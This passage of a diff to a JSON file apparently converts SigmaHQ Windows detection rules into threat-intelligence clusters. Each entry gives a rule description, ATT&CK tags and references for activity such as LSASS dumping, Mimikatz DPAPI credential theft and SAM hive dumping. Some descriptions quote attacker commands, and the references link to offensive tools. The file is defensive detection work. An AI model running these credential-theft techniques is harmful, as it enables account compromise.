"https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/adrecon/AzureADRecon", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/PowerShellMafia/PowerSploit", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/NetSPI/PowerUpSQL", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": [ @@ -38719,8 +39176,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/powershellprofile.html", "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://persistence-info.github.io/Data/powershellprofile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" ], "tags": [ @@ -38822,8 +39279,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", "https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders", + "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_startup_persistence.yml" ], "tags": [ @@ -38856,8 +39313,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", + "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml" ], "tags": [ @@ -38880,8 +39337,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" ], "tags": [ @@ -39173,10 +39630,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ @@ -39210,8 +39667,8 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml" ], "tags": [ @@ -39244,9 +39701,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], "tags": [ @@ -39303,8 +39760,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ @@ -39345,8 +39802,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/outflanknl/Dumpert", "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/outflanknl/Dumpert", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_dumpert.yml" ], "tags": [ @@ -39379,8 +39836,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" ], "tags": [ @@ -39480,8 +39937,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://cobalt.io/blog/kerberoast-attack-techniques", "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", + "https://cobalt.io/blog/kerberoast-attack-techniques", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml" ], "tags": [ @@ -39722,8 +40179,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml" ], "tags": [ @@ -39789,8 +40246,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/12", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" ], "tags": [ @@ -39896,8 +40353,20 @@ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059.001" + ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "value": "Suspicious Interactive PowerShell as SYSTEM" }, @@ -39982,8 +40451,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" ], "tags": [ @@ -40050,8 +40519,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "Internal Research", + "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml" ], "tags": [ @@ -40074,11 +40543,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/search?q=CVE-2021-36934", - "https://github.com/FireFart/hivenightmare", - "https://www.google.com/search?q=%22reg.exe+save%22+sam", "https://github.com/HuskyHacks/ShadowSteal", + "https://github.com/search?q=CVE-2021-36934", "https://github.com/cube0x0/CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/FireFart/hivenightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" ], "tags": [ @@ -40716,44 +41185,22 @@ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" ], - "tags": "No established tags" - }, - "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "value": "Windows Binaries Write Suspicious Extensions" - }, - { - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" - ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" - ], "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1036" ] }, "related": [ { - "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], - "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "value": "LSASS Memory Dump File Creation" + "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "value": "Windows Binaries Write Suspicious Extensions" }, { "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", @@ -40770,12 +41217,24 @@ "refs": [ "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", - "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] }, + "related": [ + { + "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", "value": "ISO or Image Mount Indicator in Recent Files" }, @@ -41074,6 +41533,39 @@ "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File" }, + { + "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2022/04/27", + "falsepositive": [ + "The installation of new screen savers by third party software" + ], + "filename": "file_event_win_new_scr_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_scr_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", + "value": "SCR File Write Event" + }, { "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", "meta": { @@ -41088,8 +41580,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml" ], "tags": [ @@ -41122,10 +41614,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", "https://liberty-shell.com/sec/2020/02/25/shim-persistence/", "https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" ], "tags": [ @@ -41191,8 +41683,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/465533/0/html", "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://www.joesandbox.com/analysis/465533/0/html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" ], "tags": [ @@ -41267,8 +41759,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_created.yml" ], "tags": [ @@ -41388,39 +41880,6 @@ "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", "value": "QuarksPwDump Dump File" }, - { - "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", - "meta": { - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", - "creation_date": "2022/04/27", - "falsepositive": [ - "The installation of new screen savers by third party software" - ], - "filename": "file_event_win_new_src_file.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Desk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "related": [ - { - "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", - "value": "SCR File Write Event" - }, { "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "meta": { @@ -41503,10 +41962,10 @@ "logsource.product": "windows", "refs": [ "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://github.com/Wh04m1001/SysmonEoP", "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" ], @@ -41592,8 +42051,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "Internal Research", + "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml" ], "tags": [ @@ -41758,8 +42217,20 @@ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1036.008" + ] }, + "related": [ + { + "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bbfd974c-248e-4435-8de6-1e938c79c5c1", "value": "Rename Common File to DLL File" }, @@ -41843,8 +42314,8 @@ "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://github.com/hhlxf/PrintNightmare", "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/hhlxf/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_print_nightmare.yml" ], "tags": [ @@ -41979,8 +42450,8 @@ "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" ], "tags": [ @@ -42100,6 +42571,40 @@ "uuid": "ff301988-c231-4bd0-834c-ac9d73b86586", "value": "PowerShell Console History Logs Deleted" }, + { + "description": "Detects the deletion of the \"Zone.Identifier\" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/04", + "falsepositive": [ + "Other third party applications not listed." + ], + "filename": "file_delete_win_zone_identifier_ads_uncommon.yml", + "level": "medium", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "3109530e-ab47-4cc6-a953-cac5ebcc93ae", + "value": "ADS Zone.Identifier Deleted By Uncommon Application" + }, { "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { @@ -42134,21 +42639,24 @@ "value": "Unusual File Deletion by Dns.exe" }, { - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "description": "Detects file access requests to browser credential stores by uncommon processes.\nCould indicate potential attempt of credential stealing.\nRequires heavy baselining before usage\n", "meta": { - "author": "Nasreddine Bencherchali (Nextron Systems)", - "creation_date": "2022/10/11", + "author": "frack113", + "creation_date": "2022/04/09", "falsepositive": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Legitimate software installed on partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\"" ], - "filename": "file_access_win_credential_manager_stealing.yml", - "level": "medium", + "filename": "file_access_win_browser_credential_access.yml", + "level": "low", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" + "https://github.com/lclevy/firepwd", + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_access.yml" ], "tags": [ "attack.t1003", @@ -42164,11 +42672,11 @@ "type": "related-to" } ], - "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", - "value": "Credential Manager Access" + "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "value": "Access To Browser Credential Files By Uncommon Application" }, { - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "description": "Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.\nThis can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022/10/17", @@ -42180,8 +42688,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" ], "tags": [ @@ -42199,27 +42707,24 @@ } ], "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", - "value": "Suspicious Access To Windows DPAPI Master Keys" + "value": "Access To Windows DPAPI Master Keys By Uncommon Application" }, { - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", "meta": { - "author": "frack113", - "creation_date": "2022/04/09", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2022/10/11", "falsepositive": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Legitimate software installed on partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\"" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], - "filename": "file_access_win_browser_credential_stealing.yml", + "filename": "file_access_win_credential_manager_access.yml", "level": "medium", "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", - "https://github.com/lclevy/firepwd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_access.yml" ], "tags": [ "attack.t1003", @@ -42235,11 +42740,11 @@ "type": "related-to" } ], - "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "value": "Suspicious Access To Browser Credential Files" + "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "value": "Credential Manager Access By Uncommon Application" }, { - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "description": "Detects file access requests to the Windows Credential History File by an uncommon application.\nThis can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022/10/17", @@ -42251,8 +42756,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" ], "tags": [ @@ -42270,7 +42775,40 @@ } ], "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "value": "Suspicious Access To Windows Credential History File" + "value": "Access To Windows Credential History File By Uncommon Application" + }, + { + "description": "Detects file access requests to files ending with either the \".hive\"/\".reg\" extension, usally associated with Windows Registry backups.", + "meta": { + "author": "frack113", + "creation_date": "2023/09/15", + "falsepositive": [ + "Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required." + ], + "filename": "file_access_win_reg_and_hive_access.yml", + "level": "low", + "logsource.category": "file_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/tccontre/Reg-Restore-Persistence-Mole", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_reg_and_hive_access.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "related": [ + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "337a31c6-46c4-46be-886a-260d7aa78cac", + "value": "Access To .Reg/.Hive Files By Uncommon Application" }, { "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", @@ -42351,8 +42889,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://twitter.com/notwhickey/status/1333900137232523264", "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://twitter.com/notwhickey/status/1333900137232523264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml" ], "tags": [ @@ -42451,10 +42989,10 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", 